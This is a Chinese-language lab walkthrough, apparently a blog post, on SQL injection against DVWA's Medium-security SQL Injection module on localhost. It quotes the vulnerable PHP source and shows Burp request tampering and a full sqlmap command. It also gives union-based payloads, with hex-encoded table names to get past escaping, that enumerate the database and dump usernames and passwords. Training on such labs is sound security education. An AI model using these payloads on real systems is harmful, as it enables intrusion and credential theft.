（八）DVWA之SQL Injection--SQLMap&Burp测试（Medium）

一、测试需求分析

测试对象：DVWA漏洞系统--SQL Injection模块--User ID提交功能
防御等级：Medium
测试目标：判断被测模块是否存在SQL注入漏洞，漏洞是否可利用，若可以则检测出对应的数据库数据
测试方式：手工/SQLMap+BurpSuite

url: http://localhost:8001/dvwa/vulnerabilities/sqli/

被测模块

防御等级为Medium的后端控制代码：
medium.php

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . mysqli_connect_error() . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

比较medium.php和low.php的控制代码：

medium.php VS low.php

差异点	Medium	Low
1. 字符转义处理	mysqli_real_escape_string()
2. query参数类型	user_id = $id	user_id = '$id'
3. 参数传递请求	_POST[ 'id' ]	_REQUEST[ 'id' ]

从以上代码比较分析可知：

1. 防御为Medium级别的代码对参数id进行了过滤，通过PHP函数mysqli_real_escape_string()将$id变量中的特殊符号（如：单引号'、双引号"、反斜杠\...）进行转义处理；同时前端页面设置成了下拉表单的样式，以此控制用户的输入
2. Medium级别的query查询语句中的参数id去掉了引号，调整成数字型，Low级别的是字符型（参数值带引号）
3. Medium级别：$_POST接收POST方式发送的请求，POST请求通过form表单传输参数；Low级别：$_REQUEST可接收GET或POST方式发送的请求。而GET方式发送的GET请求通过地址栏传输参数

PS：mysqli_real_escape_string()函数的作用，可参看==>PHP 5 MySQLi 函数

对于Medium级别的前后端的代码和样式调整，采取的测试策略为：
1. 利用拦截工具（BurpSuite）拦截浏览器端和服务器端之间的POST请求数据，抓取涉及查询的数据，修改参数，构造恶意攻击的查询语句绕过客户端直接向服务端发送请求
2. 除此，还可以利用SQLMap自动化工具进行测试基于POST请求的SQL注入漏洞，此时需要结合请求体中的Form Data一起检测（常规情况下，因POST请求的url中不包含传递的参数，参数放在了Form Data中进行传递）

二、判断是否存在注入点，以及注入的类型

方式1：

Burp拦截到的Submit数据

在Raw数据区域，右键选择Send to Repeater
修改拦截数据中POST请求体的id参数为：
id=1' or 1=1 # 提交后返回空白记录
id=1' or 1=2 # 提交后返回空白记录
id=1 or 1=1 # 提交后返回所有ID的First name、Surname
id=1 or 1=2 # 提交后无返回ID相关的数据

 

从以上数据可判断，对于url（http://localhost:8001/dvwa/vulnerabilities/sqli/），其POST请求Form Data中的参数id存在数字型的SQL注入

方式2：
也可以利用SQLMap来检查注入点，此时需要获取cookie、POST请求体中的数据（通过浏览器的F12查看or拦截工具查看）

SQLMap操作命令：
python2 sqlmap.py -u "http://localhost:8001/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=5cumofndbv4g7cme2jj5gci0s1" --batch

三、获取数据库信息

1.猜解所查询的字段数目

构造参数id取值的SQL查询
1 order by 2 # 提交后返回正常的ID数据
1 order by 3 # 提交后返回空白记录

==>说明SQL查询的有2个字段

2.获取字段显示位

1 union select 1,2 # 提交后返回的显示位分别在字段First name、Surname上

对于后端PHP语言环境（Response数据中已列出），数字型的查询，大致可推测出Query语句类似如==> select FirstName,Surname from UserTables where UserID=$id;

3.通过显示位获取数据库信息

尝试用Mysql的内置函数在字段显示位上获取数据库信息

database()------------当前连接数据库的名称
version()-------------DBMS的版本
user()----------------当前连接数据库的用户
@@version_compile_os--服务器的操作系统
@@datadir-------------数据库存储目录

 

 

4.获取数据库中的表名

• 获取DBMS中所有数据库的名称
  1 union select 1,schema_name from information_schema.schemata #

 

• 获取当前连接数据库(dvwa)中的所有表
  1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

 

5.获取表中的列名（字段）

1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
查询返回空白记录，推测很可能是后端的mysqli_real_escape_string()函数对query语句中的单引号作了转义处理

重新调整策略，对query语句中的users字符串进行16进制转换以期绕过服务端的转义机制，引号则不需要出现在16进制中

十六进制常量
MySQL支持十六进制值，一个十六进制值通常指定为一个字符串常量。每对十六进制数字被转换为一个字符，其最前面有一个大写字母“X”或小写“x”。在引号中只可以使用数字[0-9]、字母[a-f]、[A-F]，x'4D7953514C'表示字符串MySQL。
十六进制数值不区分大小写，其前缀“X”或“x”可以被“0x”取代而且不用引号。即X'41'可以替换为0x41，注意：“0x”中x一定要小写。
十六进制值的默认类型是字符串。如果想要确保该值作为数字处理，可以使用cast（...AS UNSIGNED）。如执行语句：SELECT0x41, CAST(0x41 AS UNSIGNED);
如果要将一个字符串或数字转换为十六进制格式的字符串，可以用hex()函数。如将字符串CAT转换为16进制：SELECT HEX('CAT');

进行16进制（Hex编码）转换： users ==> 0x7573657273

转换操作可以利用专门的工具，也可利用python代码实现转换过程

import binascii
h = binascii.b2a_hex(b'users')
# h = b'users'.hex()
print(h)

将python输出的字符串7573657273的前面加上0x变为：0x7573657273

对应的SQLMap操作命令为：
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

获取到了users表中的8个字段的名称

6.导出数据库中的数据

1 union select 1,concat_ws(0x2D2D,user,password) from users #
其中0x2D2D表示16进制的字符串'--'

获取到了前端登录dvwa站点的用户名和密码

7.验证导出数据的有效性

同样的，对获取的密码解密之后即可登录检查，解密方式可参看==>手工测试DVWA之SQL注入漏洞-详细解析（防御: Low）

作者：Fighting_001
链接：https://www.jianshu.com/p/9498ddce285a
来源：简书